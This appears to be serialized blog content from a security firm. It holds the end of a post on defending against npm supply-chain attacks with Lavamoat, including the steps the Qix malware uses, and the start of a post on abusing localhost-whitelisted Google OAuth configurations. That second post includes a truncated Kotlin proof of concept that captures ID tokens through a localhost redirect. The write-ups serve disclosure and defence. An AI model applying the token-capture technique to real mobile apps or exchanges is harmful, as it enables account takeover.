{"class":5559,"line":5642},[101667,101672,101676],{"type":26,"tag":137,"props":101668,"children":101669},{"style":6837},[101670],{"type":32,"value":101671},"\"@react-native-picker/picker\"",{"type":26,"tag":137,"props":101673,"children":101674},{"style":5601},[101675],{"type":32,"value":17923},{"type":26,"tag":137,"props":101677,"children":101678},{"style":6837},[101679],{"type":32,"value":101680},"\"2.11.0\"\n",{"type":26,"tag":118,"props":101682,"children":101684},{"id":101683},"_2-use-npm-ci",[101685,101687],{"type":32,"value":101686},"2. Use ",{"type":26,"tag":130,"props":101688,"children":101690},{"className":101689},[],[101691],{"type":32,"value":101692},"npm ci",{"type":26,"tag":35,"props":101694,"children":101695},{},[101696,101701,101703,101709,101711,101716],{"type":26,"tag":130,"props":101697,"children":101699},{"className":101698},[],[101700],{"type":32,"value":101692},{"type":32,"value":101702}," uses the dependency versions from ",{"type":26,"tag":130,"props":101704,"children":101706},{"className":101705},[],[101707],{"type":32,"value":101708},"package-lock.json",{"type":32,"value":101710}," to install the packages. Consider using it in CI/CD workflows and only use ",{"type":26,"tag":130,"props":101712,"children":101714},{"className":101713},[],[101715],{"type":32,"value":101578},{"type":32,"value":101717}," when adding a new package or updating an existing one.",{"type":26,"tag":118,"props":101719,"children":101721},{"id":101720},"_3-implement-lavamoat",[101722,101724],{"type":32,"value":101723},"3. Implement ",{"type":26,"tag":41,"props":101725,"children":101728},{"href":101726,"rel":101727},"https://github.com/LavaMoat/LavaMoat/tree/main",[45],[101729],{"type":26,"tag":84,"props":101730,"children":101731},{},[101732],{"type":32,"value":101733},"Lavamoat",{"type":26,"tag":35,"props":101735,"children":101736},{},[101737],{"type":32,"value":101738},"Basic hygiene helps, but it doesn’t solve the root issue: a minor utility package has the same permissions as your code. Lavamoat changes this model. Lavamoat, created by MetaMask, addresses this by sandboxing packages and enforcing least privilege. With it, even if a dependency contains malware, it cannot compromise the application.",{"type":26,"tag":35,"props":101740,"children":101741},{},[101742],{"type":32,"value":101743},"Lavamoat uses SES (Hardened JavaScript) to enforce these restrictions, limiting the globals, functions, and sub-dependencies each package can access. The rules are defined in a policy file, which looks like this:",{"type":26,"tag":5512,"props":101745,"children":101747},{"code":101746,"language":36593,"meta":7,"className":36591,"style":7},"\"resources\": {\n    \"@ethereumjs/util>@ethereumjs/rlp\": {\n      \"globals\": {\n        \"TextEncoder\": true\n      }\n    },\n    \"@ethereumjs/util\": {\n      \"globals\": {\n        \"console.warn\": true,\n        \"fetch\": true\n      },\n      \"packages\": {\n        \"@ethereumjs/util>@ethereumjs/rlp\": true,\n        \"@ethereumjs/util>ethereum-cryptography\": true\n      }\n    }\n}\n",[101748],{"type":26,"tag":130,"props":101749,"children":101750},{"__ignoreMap":7},[101751,101763,101775,101786,101802,101809,101816,101828,101839,101859,101875,101882,101893,101913,101929,101936,101943],{"type":26,"tag":137,"props":101752,"children":101753},{"class":5559,"line":5560},[101754,101759],{"type":26,"tag":137,"props":101755,"children":101756},{"style":6837},[101757],{"type":32,"value":101758},"\"resources\"",{"type":26,"tag":137,"props":101760,"children":101761},{"style":5601},[101762],{"type":32,"value":39618},{"type":26,"tag":137,"props":101764,"children":101765},{"class":5559,"line":5412},[101766,101771],{"type":26,"tag":137,"props":101767,"children":101768},{"style":5584},[101769],{"type":32,"value":101770},"    \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":26,"tag":137,"props":101772,"children":101773},{"style":5601},[101774],{"type":32,"value":39618},{"type":26,"tag":137,"props":101776,"children":101777},{"class":5559,"line":5417},[101778,101782],{"type":26,"tag":137,"props":101779,"children":101780},{"style":5584},[101781],{"type":32,"value":39626},{"type":26,"tag":137,"props":101783,"children":101784},{"style":5601},[101785],{"type":32,"value":39618},{"type":26,"tag":137,"props":101787,"children":101788},{"class":5559,"line":5642},[101789,101794,101798],{"type":26,"tag":137,"props":101790,"children":101791},{"style":5584},[101792],{"type":32,"value":101793},"        \"TextEncoder\"",{"type":26,"tag":137,"props":101795,"children":101796},{"style":5601},[101797],{"type":32,"value":17923},{"type":26,"tag":137,"props":101799,"children":101800},{"style":5573},[101801],{"type":32,"value":39787},{"type":26,"tag":137,"props":101803,"children":101804},{"class":5559,"line":5745},[101805],{"type":26,"tag":137,"props":101806,"children":101807},{"style":5601},[101808],{"type":32,"value":15255},{"type":26,"tag":137,"props":101810,"children":101811},{"class":5559,"line":5850},[101812],{"type":26,"tag":137,"props":101813,"children":101814},{"style":5601},[101815],{"type":32,"value":27973},{"type":26,"tag":137,"props":101817,"children":101818},{"class":5559,"line":5878},[101819,101824],{"type":26,"tag":137,"props":101820,"children":101821},{"style":5584},[101822],{"type":32,"value":101823},"    \"@ethereumjs/util\"",{"type":26,"tag":137,"props":101825,"children":101826},{"style":5601},[101827],{"type":32,"value":39618},{"type":26,"tag":137,"props":101829,"children":101830},{"class":5559,"line":5891},[101831,101835],{"type":26,"tag":137,"props":101832,"children":101833},{"style":5584},[101834],{"type":32,"value":39626},{"type":26,"tag":137,"props":101836,"children":101837},{"style":5601},[101838],{"type":32,"value":39618},{"type":26,"tag":137,"props":101840,"children":101841},{"class":5559,"line":5909},[101842,101847,101851,101855],{"type":26,"tag":137,"props":101843,"children":101844},{"style":5584},[101845],{"type":32,"value":101846},"        \"console.warn\"",{"type":26,"tag":137,"props":101848,"children":101849},{"style":5601},[101850],{"type":32,"value":17923},{"type":26,"tag":137,"props":101852,"children":101853},{"style":5573},[101854],{"type":32,"value":146},{"type":26,"tag":137,"props":101856,"children":101857},{"style":5601},[101858],{"type":32,"value":6099},{"type":26,"tag":137,"props":101860,"children":101861},{"class":5559,"line":5930},[101862,101867,101871],{"type":26,"tag":137,"props":101863,"children":101864},{"style":5584},[101865],{"type":32,"value":101866},"        \"fetch\"",{"type":26,"tag":137,"props":101868,"children":101869},{"style":5601},[101870],{"type":32,"value":17923},{"type":26,"tag":137,"props":101872,"children":101873},{"style":5573},[101874],{"type":32,"value":39787},{"type":26,"tag":137,"props":101876,"children":101877},{"class":5559,"line":5939},[101878],{"type":26,"tag":137,"props":101879,"children":101880},{"style":5601},[101881],{"type":32,"value":39795},{"type":26,"tag":137,"props":101883,"children":101884},{"class":5559,"line":6191},[101885,101889],{"type":26,"tag":137,"props":101886,"children":101887},{"style":5584},[101888],{"type":32,"value":39803},{"type":26,"tag":137,"props":101890,"children":101891},{"style":5601},[101892],{"type":32,"value":39618},{"type":26,"tag":137,"props":101894,"children":101895},{"class":5559,"line":6208},[101896,101901,101905,101909],{"type":26,"tag":137,"props":101897,"children":101898},{"style":5584},[101899],{"type":32,"value":101900},"        \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":26,"tag":137,"props":101902,"children":101903},{"style":5601},[101904],{"type":32,"value":17923},{"type":26,"tag":137,"props":101906,"children":101907},{"style":5573},[101908],{"type":32,"value":146},{"type":26,"tag":137,"props":101910,"children":101911},{"style":5601},[101912],{"type":32,"value":6099},{"type":26,"tag":137,"props":101914,"children":101915},{"class":5559,"line":6225},[101916,101921,101925],{"type":26,"tag":137,"props":101917,"children":101918},{"style":5584},[101919],{"type":32,"value":101920},"        \"@ethereumjs/util>ethereum-cryptography\"",{"type":26,"tag":137,"props":101922,"children":101923},{"style":5601},[101924],{"type":32,"value":17923},{"type":26,"tag":137,"props":101926,"children":101927},{"style":5573},[101928],{"type":32,"value":39787},{"type":26,"tag":137,"props":101930,"children":101931},{"class":5559,"line":6238},[101932],{"type":26,"tag":137,"props":101933,"children":101934},{"style":5601},[101935],{"type":32,"value":15255},{"type":26,"tag":137,"props":101937,"children":101938},{"class":5559,"line":6247},[101939],{"type":26,"tag":137,"props":101940,"children":101941},{"style":5601},[101942],{"type":32,"value":5945},{"type":26,"tag":137,"props":101944,"children":101945},{"class":5559,"line":6270},[101946],{"type":26,"tag":137,"props":101947,"children":101948},{"style":5601},[101949],{"type":32,"value":6507},{"type":26,"tag":35,"props":101951,"children":101952},{},[101953,101955,101961,101963,101969,101970,101975,101977,101983,101984,101990],{"type":32,"value":101954},"In this example, it restricts the ",{"type":26,"tag":130,"props":101956,"children":101958},{"className":101957},[],[101959],{"type":32,"value":101960},"@ethereumjs/util",{"type":32,"value":101962}," package to use only ",{"type":26,"tag":130,"props":101964,"children":101966},{"className":101965},[],[101967],{"type":32,"value":101968},"console.warn",{"type":32,"value":3339},{"type":26,"tag":130,"props":101971,"children":101973},{"className":101972},[],[101974],{"type":32,"value":36690},{"type":32,"value":101976}," functions, and to include only ",{"type":26,"tag":130,"props":101978,"children":101980},{"className":101979},[],[101981],{"type":32,"value":101982},"@ethereumjs/rlp",{"type":32,"value":3339},{"type":26,"tag":130,"props":101985,"children":101987},{"className":101986},[],[101988],{"type":32,"value":101989},"ethereum-cryptography",{"type":32,"value":101991}," packages.",{"type":26,"tag":35,"props":101993,"children":101994},{},[101995],{"type":32,"value":101996},"The policy files can be generated automatically and should be regenerated carefully, because if you generate a policy while a malicious package is installed, Lavamoat’s protection can be bypassed.",{"type":26,"tag":35,"props":101998,"children":101999},{},[102000,102002,102008],{"type":32,"value":102001},"Lavamoat also automatically freezes the global objects to prevent them being replaced or tampered with. See ",{"type":26,"tag":41,"props":102003,"children":102006},{"href":102004,"rel":102005},"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze",[45],[102007],{"type":32,"value":39973},{"type":32,"value":470},{"type":26,"tag":118,"props":102010,"children":102012},{"id":102011},"lavamoat-vs-qix-malware",[102013],{"type":32,"value":102014},"Lavamoat vs Qix Malware",{"type":26,"tag":35,"props":102016,"children":102017},{},[102018,102020,102025],{"type":32,"value":102019},"If a dApp were compromised with the Qix malware (say it used ",{"type":26,"tag":130,"props":102021,"children":102023},{"className":102022},[],[102024],{"type":32,"value":99865},{"type":32,"value":102026},"), it would need to perform the following actions to drain funds from a wallet:",{"type":26,"tag":4820,"props":102028,"children":102029},{},[102030,102042,102053,102064],{"type":26,"tag":3430,"props":102031,"children":102032},{},[102033,102035,102040],{"type":32,"value":102034},"Replace ",{"type":26,"tag":130,"props":102036,"children":102038},{"className":102037},[],[102039],{"type":32,"value":36690},{"type":32,"value":102041}," function to a custom one",{"type":26,"tag":3430,"props":102043,"children":102044},{},[102045,102047],{"type":32,"value":102046},"Access ",{"type":26,"tag":130,"props":102048,"children":102050},{"className":102049},[],[102051],{"type":32,"value":102052},"window.ethereum",{"type":26,"tag":3430,"props":102054,"children":102055},{},[102056,102058,102063],{"type":32,"value":102057},"Call original ",{"type":26,"tag":130,"props":102059,"children":102061},{"className":102060},[],[102062],{"type":32,"value":36690},{"type":32,"value":40810},{"type":26,"tag":3430,"props":102065,"children":102066},{},[102067],{"type":32,"value":102068},"Plus other actions not relevant here",{"type":26,"tag":35,"props":102070,"children":102071},{},[102072,102074,102080],{"type":32,"value":102073},"If the dApp is using Lavamoat with a generated policy for ",{"type":26,"tag":130,"props":102075,"children":102077},{"className":102076},[],[102078],{"type":32,"value":102079},"chalk 5.6.0",{"type":32,"value":102081}," (non-malicious version) it would look like this:",{"type":26,"tag":5512,"props":102083,"children":102085},{"code":102084,"language":36593,"meta":7,"className":36591,"style":7},"\"chalk\": {\n      \"globals\": {\n        \"navigator.userAgent\": true,\n        \"navigator.userAgentData\": true\n      }\n    },\n",[102086],{"type":26,"tag":130,"props":102087,"children":102088},{"__ignoreMap":7},[102089,102101,102112,102132,102148,102155],{"type":26,"tag":137,"props":102090,"children":102091},{"class":5559,"line":5560},[102092,102097],{"type":26,"tag":137,"props":102093,"children":102094},{"style":6837},[102095],{"type":32,"value":102096},"\"chalk\"",{"type":26,"tag":137,"props":102098,"children":102099},{"style":5601},[102100],{"type":32,"value":39618},{"type":26,"tag":137,"props":102102,"children":102103},{"class":5559,"line":5412},[102104,102108],{"type":26,"tag":137,"props":102105,"children":102106},{"style":5584},[102107],{"type":32,"value":39626},{"type":26,"tag":137,"props":102109,"children":102110},{"style":5601},[102111],{"type":32,"value":39618},{"type":26,"tag":137,"props":102113,"children":102114},{"class":5559,"line":5417},[102115,102120,102124,102128],{"type":26,"tag":137,"props":102116,"children":102117},{"style":5584},[102118],{"type":32,"value":102119},"        \"navigator.userAgent\"",{"type":26,"tag":137,"props":102121,"children":102122},{"style":5601},[102123],{"type":32,"value":17923},{"type":26,"tag":137,"props":102125,"children":102126},{"style":5573},[102127],{"type":32,"value":146},{"type":26,"tag":137,"props":102129,"children":102130},{"style":5601},[102131],{"type":32,"value":6099},{"type":26,"tag":137,"props":102133,"children":102134},{"class":5559,"line":5642},[102135,102140,102144],{"type":26,"tag":137,"props":102136,"children":102137},{"style":5584},[102138],{"type":32,"value":102139},"        \"navigator.userAgentData\"",{"type":26,"tag":137,"props":102141,"children":102142},{"style":5601},[102143],{"type":32,"value":17923},{"type":26,"tag":137,"props":102145,"children":102146},{"style":5573},[102147],{"type":32,"value":39787},{"type":26,"tag":137,"props":102149,"children":102150},{"class":5559,"line":5745},[102151],{"type":26,"tag":137,"props":102152,"children":102153},{"style":5601},[102154],{"type":32,"value":15255},{"type":26,"tag":137,"props":102156,"children":102157},{"class":5559,"line":5850},[102158],{"type":26,"tag":137,"props":102159,"children":102160},{"style":5601},[102161],{"type":32,"value":27973},{"type":26,"tag":35,"props":102163,"children":102164},{},[102165,102167,102173],{"type":32,"value":102166},"That means that the chalk dependency can only access these two global attributes from ",{"type":26,"tag":130,"props":102168,"children":102170},{"className":102169},[],[102171],{"type":32,"value":102172},"navigator",{"type":32,"value":470},{"type":26,"tag":35,"props":102175,"children":102176},{},[102177,102179,102185],{"type":32,"value":102178},"When the compromised dApp would execute the malicious payload of ",{"type":26,"tag":130,"props":102180,"children":102182},{"className":102181},[],[102183],{"type":32,"value":102184},"chalk v5.6.1",{"type":32,"value":102186}," it would fail due to insufficient permissions:",{"type":26,"tag":35,"props":102188,"children":102189},{},[102190],{"type":26,"tag":2210,"props":102191,"children":102193},{"alt":53181,"src":102192},"/posts/supply-chain-attcks/error.png",[],{"type":26,"tag":35,"props":102195,"children":102196},{},[102197,102199,102204],{"type":32,"value":102198},"This error shows that the malware failed since it cannot redefine ",{"type":26,"tag":130,"props":102200,"children":102202},{"className":102201},[],[102203],{"type":32,"value":36690},{"type":32,"value":28060},{"type":26,"tag":5512,"props":102206,"children":102208},{"code":102207},"TypeError#1: Cannot define property fetch, object is not extensible\n",[102209],{"type":26,"tag":130,"props":102210,"children":102211},{"__ignoreMap":7},[102212],{"type":32,"value":102207},{"type":26,"tag":92,"props":102214,"children":102216},{"id":102215},"lavamoat-in-practice",[102217],{"type":32,"value":102218},"Lavamoat In Practice",{"type":26,"tag":35,"props":102220,"children":102221},{},[102222,102224,102231],{"type":32,"value":102223},"The OtterSec team audited the Lavamoat Webpack Plugin in late 2024 and identified vulnerabilities that attackers could abuse to bypass Lavamoat protections (",{"type":26,"tag":41,"props":102225,"children":102228},{"href":102226,"rel":102227},"https://osec.io/reports/lavamoat_audit_final.pdf",[45],[102229],{"type":32,"value":102230},"see the audit report",{"type":32,"value":4437},{"type":26,"tag":35,"props":102233,"children":102234},{},[102235],{"type":32,"value":102236},"Like any security tool, it isn’t flawless, but it represents an important shift: it minimizes what malicious code can do, rather than assuming every dependency deserves full trust. Supply-chain attacks are designed to hit as many victims as possible, not to target individual organizations. By implementing Lavamoat, you dramatically reduce your exposure and force attackers to look elsewhere.",{"type":26,"tag":92,"props":102238,"children":102239},{"id":78400},[102240],{"type":32,"value":78403},{"type":26,"tag":35,"props":102242,"children":102243},{},[102244],{"type":32,"value":102245},"The NPM incident may not have caused massive losses, but it was a clear proof-of-concept for how fragile the current model is. Supply-chain attacks will happen again, and relying on registry security alone is not enough.",{"type":26,"tag":35,"props":102247,"children":102248},{},[102249,102251,102256],{"type":32,"value":102250},"Version pinning and ",{"type":26,"tag":130,"props":102252,"children":102254},{"className":102253},[],[102255],{"type":32,"value":101692},{"type":32,"value":102257}," provide a baseline defense, but Lavamoat represents the next step: enforcing least privilege for dependencies. If you’re building critical applications, adopting and contributing to Lavamoat is one of the most effective ways to stay ahead.",{"type":26,"tag":7949,"props":102259,"children":102260},{},[102261],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":102263},[102264,102267,102268,102277,102278],{"id":99880,"depth":5412,"text":99883,"children":102265},[102266],{"id":101515,"depth":5417,"text":101518},{"id":101526,"depth":5412,"text":101529},{"id":101542,"depth":5412,"text":101545,"children":102269},[102270,102272,102274,102276],{"id":101553,"depth":5417,"text":102271},"1. Version pinning in package.json",{"id":101683,"depth":5417,"text":102273},"2. Use npm ci",{"id":101720,"depth":5417,"text":102275},"3. Implement Lavamoat",{"id":102011,"depth":5417,"text":102014},{"id":102215,"depth":5412,"text":102218},{"id":78400,"depth":5412,"text":78403},"content:blog:2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks",{"_path":102283,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":102284,"description":102285,"date":102286,"author":102287,"image":102288,"isFeatured":18,"onBlogPage":18,"tags":102290,"body":102293,"_type":5433,"_id":104624,"_source":5435,"_file":104625,"_stem":104626,"_extension":5438},"/blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations","How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs","OAuth misconfigurations show how common dev settings can lead to account takeovers. Explore real cases where failing to account for differences between desktop and mobile environments left SDKs, exchanges, and wallets vulnerable to exploits.","2025-10-16T12:00:00.000Z",[33796,33795],{"src":102289,"width":16,"height":17},"/posts/oauth-misconfigurations/title.png",[102291,102292],"oAuth","exchanges",{"type":23,"children":102294,"toc":104611},[102295,102301,102306,102312,102332,102338,102343,102356,102361,102369,102383,102392,102401,102415,102423,102434,102494,102500,102512,102561,102567,102572,102585,102592,102603,102623,102642,102663,102669,102682,102687,102693,102712,103337,103342,103355,104216,104221,104226,104232,104237,104243,104248,104261,104301,104307,104320,104325,104358,104363,104368,104393,104398,104410,104567,104572,104576,104588,104593,104597,104602,104607],{"type":26,"tag":92,"props":102296,"children":102298},{"id":102297},"exploiting-oauth",[102299],{"type":32,"value":102300},"Exploiting OAuth",{"type":26,"tag":35,"props":102302,"children":102303},{},[102304],{"type":32,"value":102305},"Our main research focus was related to recent vulnerabilities we found in some of our audits. One common issue we find is related to OAuth misconfigurations that can be exploited to achieve account takeover. To understand the vulnerability and the exploit itself, we first need to dig into the different OAuth flows and the configurations that can be made in the Google Cloud Console.",{"type":26,"tag":118,"props":102307,"children":102309},{"id":102308},"google-authentication-flows",[102310],{"type":32,"value":102311},"Google Authentication Flows",{"type":26,"tag":35,"props":102313,"children":102314},{},[102315,102317,102323,102325,102330],{"type":32,"value":102316},"During our research, we identified various Google Authentication flows that require different exploitation methods. The new/most recent flow is called GSI, which mainly uses ",{"type":26,"tag":130,"props":102318,"children":102320},{"className":102319},[],[102321],{"type":32,"value":102322},"postMessage",{"type":32,"value":102324}," for communication with the Relying Party (RP), and the old one mostly uses ",{"type":26,"tag":130,"props":102326,"children":102328},{"className":102327},[],[102329],{"type":32,"value":72367},{"type":32,"value":102331}," to send the token back to the RP.",{"type":26,"tag":21485,"props":102333,"children":102335},{"id":102334},"gsi-new-flow",[102336],{"type":32,"value":102337},"GSI (New Flow)",{"type":26,"tag":35,"props":102339,"children":102340},{},[102341],{"type":32,"value":102342},"The GSI flow also has two ways to authenticate the user to the RP:",{"type":26,"tag":3426,"props":102344,"children":102345},{},[102346,102351],{"type":26,"tag":3430,"props":102347,"children":102348},{},[102349],{"type":32,"value":102350},"Using FedCM API",{"type":26,"tag":3430,"props":102352,"children":102353},{},[102354],{"type":32,"value":102355},"Without using FedCM API",{"type":26,"tag":35,"props":102357,"children":102358},{},[102359],{"type":32,"value":102360},"FedCM (Federated Credentials Manager) is a new browser API that lets users authenticate natively to an RP using a third-party IdP.",{"type":26,"tag":35,"props":102362,"children":102363},{},[102364],{"type":26,"tag":84,"props":102365,"children":102366},{},[102367],{"type":32,"value":102368},"FedCM Method",{"type":26,"tag":35,"props":102370,"children":102371},{},[102372,102374,102381],{"type":32,"value":102373},"The FedCM method basically follows this ",{"type":26,"tag":41,"props":102375,"children":102378},{"href":102376,"rel":102377},"https://privacysandbox.google.com/cookies/fedcm/why#user-interaction",[45],[102379],{"type":32,"value":102380},"user experience",{"type":32,"value":102382},". Users can log in by clicking a login button (which will open a \"choose your account\" prompt window) or by 1-tap UX (see images below).",{"type":26,"tag":35,"props":102384,"children":102385},{},[102386,102388],{"type":32,"value":102387},"The normal flow, clicking the \"sign in\" button:\n",{"type":26,"tag":2210,"props":102389,"children":102391},{"alt":53181,"src":102390},"/posts/oauth-misconfigurations/image1.png",[],{"type":26,"tag":35,"props":102393,"children":102394},{},[102395,102397],{"type":32,"value":102396},"One-Tap popup shown when you open the page:\n",{"type":26,"tag":2210,"props":102398,"children":102400},{"alt":53181,"src":102399},"/posts/oauth-misconfigurations/image2.png",[],{"type":26,"tag":35,"props":102402,"children":102403},{},[102404,102406,102413],{"type":32,"value":102405},"Both flows use FedCM API to authenticate using Google IdP service, which makes some CORS requests to the IdP server to return the token. After authenticating the first time, when the user returns to the same website after some time, it is possible to automatically reauthenticate using ",{"type":26,"tag":41,"props":102407,"children":102410},{"href":102408,"rel":102409},"https://github.com/w3c-fedid/FedCM/issues/429",[45],[102411],{"type":32,"value":102412},"FedCM auto-reauthentication",{"type":32,"value":102414},", which has certain preconditions that must be met.",{"type":26,"tag":35,"props":102416,"children":102417},{},[102418],{"type":26,"tag":84,"props":102419,"children":102420},{},[102421],{"type":32,"value":102422},"Non-FedCM Method",{"type":26,"tag":35,"props":102424,"children":102425},{},[102426,102428,102433],{"type":32,"value":102427},"This method uses a popup window (or iframe) to open the Google OAuth consent page and return the token via ",{"type":26,"tag":130,"props":102429,"children":102431},{"className":102430},[],[102432],{"type":32,"value":102322},{"type":32,"value":7072},{"type":26,"tag":4820,"props":102435,"children":102436},{},[102437,102442,102466,102471,102482],{"type":26,"tag":3430,"props":102438,"children":102439},{},[102440],{"type":32,"value":102441},"The user clicks the sign in button",{"type":26,"tag":3430,"props":102443,"children":102444},{},[102445,102447,102453,102455,102460,102461],{"type":32,"value":102446},"RP opens a popup/iframe to ",{"type":26,"tag":41,"props":102448,"children":102451},{"href":102449,"rel":102450},"https://accounts.google.com/o/oauth2/v2/auth",[45],[102452],{"type":32,"value":102449},{"type":32,"value":102454}," with some important parameters like ",{"type":26,"tag":130,"props":102456,"children":102458},{"className":102457},[],[102459],{"type":32,"value":72199},{"type":32,"value":3339},{"type":26,"tag":130,"props":102462,"children":102464},{"className":102463},[],[102465],{"type":32,"value":42732},{"type":26,"tag":3430,"props":102467,"children":102468},{},[102469],{"type":32,"value":102470},"The user clicks the \"Continue\" button to authorize authentication",{"type":26,"tag":3430,"props":102472,"children":102473},{},[102474,102476],{"type":32,"value":102475},"They get redirected to ",{"type":26,"tag":41,"props":102477,"children":102480},{"href":102478,"rel":102479},"https://accounts.google.com/gsi/transform",[45],[102481],{"type":32,"value":102478},{"type":26,"tag":3430,"props":102483,"children":102484},{},[102485,102487,102492],{"type":32,"value":102486},"/gsi/transform sends the token back to the RP via ",{"type":26,"tag":130,"props":102488,"children":102490},{"className":102489},[],[102491],{"type":32,"value":102322},{"type":32,"value":102493}," (after some SYN/ACK messages)",{"type":26,"tag":21485,"props":102495,"children":102497},{"id":102496},"oauth-20-old-flow",[102498],{"type":32,"value":102499},"OAuth 2.0 Old Flow",{"type":26,"tag":35,"props":102501,"children":102502},{},[102503,102505,102510],{"type":32,"value":102504},"The old flow also redirects the user to the Google OAuth consent page and then returns the token via a ",{"type":26,"tag":130,"props":102506,"children":102508},{"className":102507},[],[102509],{"type":32,"value":72367},{"type":32,"value":102511}," provided in the URL and validated by a whitelist configuration:",{"type":26,"tag":4820,"props":102513,"children":102514},{},[102515,102519,102540,102544],{"type":26,"tag":3430,"props":102516,"children":102517},{},[102518],{"type":32,"value":102441},{"type":26,"tag":3430,"props":102520,"children":102521},{},[102522,102523,102528,102529,102534,102535],{"type":32,"value":102446},{"type":26,"tag":41,"props":102524,"children":102526},{"href":102449,"rel":102525},[45],[102527],{"type":32,"value":102449},{"type":32,"value":102454},{"type":26,"tag":130,"props":102530,"children":102532},{"className":102531},[],[102533],{"type":32,"value":72199},{"type":32,"value":3339},{"type":26,"tag":130,"props":102536,"children":102538},{"className":102537},[],[102539],{"type":32,"value":72367},{"type":26,"tag":3430,"props":102541,"children":102542},{},[102543],{"type":32,"value":102470},{"type":26,"tag":3430,"props":102545,"children":102546},{},[102547,102548,102553,102555],{"type":32,"value":102475},{"type":26,"tag":130,"props":102549,"children":102551},{"className":102550},[],[102552],{"type":32,"value":72367},{"type":32,"value":102554}," with the token in the query parameters or ",{"type":26,"tag":130,"props":102556,"children":102558},{"className":102557},[],[102559],{"type":32,"value":102560},"location.hash",{"type":26,"tag":21485,"props":102562,"children":102564},{"id":102563},"different-configurations",[102565],{"type":32,"value":102566},"Different Configurations",{"type":26,"tag":35,"props":102568,"children":102569},{},[102570],{"type":32,"value":102571},"These two flows must be configured differently in the Google Cloud Console. There are two whitelist configurations that we can control:",{"type":26,"tag":3426,"props":102573,"children":102574},{},[102575,102580],{"type":26,"tag":3430,"props":102576,"children":102577},{},[102578],{"type":32,"value":102579},"Authorized origins",{"type":26,"tag":3430,"props":102581,"children":102582},{},[102583],{"type":32,"value":102584},"Authorized redirect URIs",{"type":26,"tag":35,"props":102586,"children":102587},{},[102588],{"type":26,"tag":2210,"props":102589,"children":102591},{"alt":53181,"src":102590},"/posts/oauth-misconfigurations/image3.png",[],{"type":26,"tag":35,"props":102593,"children":102594},{},[102595,102597,102602],{"type":32,"value":102596},"The described GSI flow doesn't use any redirection to send the token back to the RP, so the authorized redirect URI is not that important in the GSI flow. It uses the authorized origins to verify if the RP page is actually allowed to be authenticated using that ",{"type":26,"tag":130,"props":102598,"children":102600},{"className":102599},[],[102601],{"type":32,"value":72199},{"type":32,"value":470},{"type":26,"tag":35,"props":102604,"children":102605},{},[102606,102608,102614,102616,102621],{"type":32,"value":102607},"The actual verification in the GSI flow happens in the CORS requests made by FedCM or in ",{"type":26,"tag":130,"props":102609,"children":102611},{"className":102610},[],[102612],{"type":32,"value":102613},"/oauth2/v2/auth",{"type":32,"value":102615}," by checking the ",{"type":26,"tag":130,"props":102617,"children":102619},{"className":102618},[],[102620],{"type":32,"value":42732},{"type":32,"value":102622}," query parameter.",{"type":26,"tag":35,"props":102624,"children":102625},{},[102626,102628,102633,102635,102640],{"type":32,"value":102627},"In the old flow, the ",{"type":26,"tag":130,"props":102629,"children":102631},{"className":102630},[],[102632],{"type":32,"value":72367},{"type":32,"value":102634}," parameter passed in the ",{"type":26,"tag":130,"props":102636,"children":102638},{"className":102637},[],[102639],{"type":32,"value":102613},{"type":32,"value":102641}," endpoint is validated against the authorized redirect URIs.",{"type":26,"tag":35,"props":102643,"children":102644},{},[102645,102647,102652,102654,102661],{"type":32,"value":102646},"Note that the new GSI flow can also have a different flow using ",{"type":26,"tag":130,"props":102648,"children":102650},{"className":102649},[],[102651],{"type":32,"value":72367},{"type":32,"value":102653}," validation. To execute this flow, you need to specify ",{"type":26,"tag":41,"props":102655,"children":102658},{"href":102656,"rel":102657},"https://developers.google.com/identity/gsi/web/reference/js-reference#login_uri",[45],[102659],{"type":32,"value":102660},"login_uri",{"type":32,"value":102662}," while using the SDK.",{"type":26,"tag":118,"props":102664,"children":102666},{"id":102665},"localhost-exploit",[102667],{"type":32,"value":102668},"Localhost Exploit",{"type":26,"tag":35,"props":102670,"children":102671},{},[102672,102674,102680],{"type":32,"value":102673},"During one of our audits, we found a bug related to how developers test the OAuth flow in their development environment. Developers often whitelist the ",{"type":26,"tag":130,"props":102675,"children":102677},{"className":102676},[],[102678],{"type":32,"value":102679},"localhost",{"type":32,"value":102681}," origin because it is considered trusted for local testing.",{"type":26,"tag":35,"props":102683,"children":102684},{},[102685],{"type":32,"value":102686},"Actually, this is partially true, as it depends on which security assumptions you make. This can be an issue in a mobile environment, as mobile apps can open localhost webservers without many permissions, and having a malicious app installed is not considered a significant issue on mobile since all applications are sandboxed. This configuration allows a malicious application to \"escape\" the sandbox and attack another system.",{"type":26,"tag":21485,"props":102688,"children":102690},{"id":102689},"exploit",[102691],{"type":32,"value":102692},"Exploit",{"type":26,"tag":35,"props":102694,"children":102695},{},[102696,102698,102703,102704,102710],{"type":32,"value":102697},"To exploit this misconfiguration, we first needed to understand the OAuth flow used by the target. If the OAuth implementation follows a standard flow without using Google Sign-In (GSI), we can extract the token via ",{"type":26,"tag":130,"props":102699,"children":102701},{"className":102700},[],[102702],{"type":32,"value":102560},{"type":32,"value":15725},{"type":26,"tag":130,"props":102705,"children":102707},{"className":102706},[],[102708],{"type":32,"value":102709},"location.search",{"type":32,"value":102711},". To achieve this, we developed a Kotlin application that spins up a local web server:",{"type":26,"tag":5512,"props":102713,"children":102717},{"className":102714,"code":102715,"language":102716,"meta":7,"style":7},"language-kt shiki shiki-themes slack-dark"," override fun onCreate(savedInstanceState: Bundle?){\n        super.onCreate(savedInstanceState)\n\n        // Start the Ktor web server\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        // Open the Google OAuth page\n        val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n        val 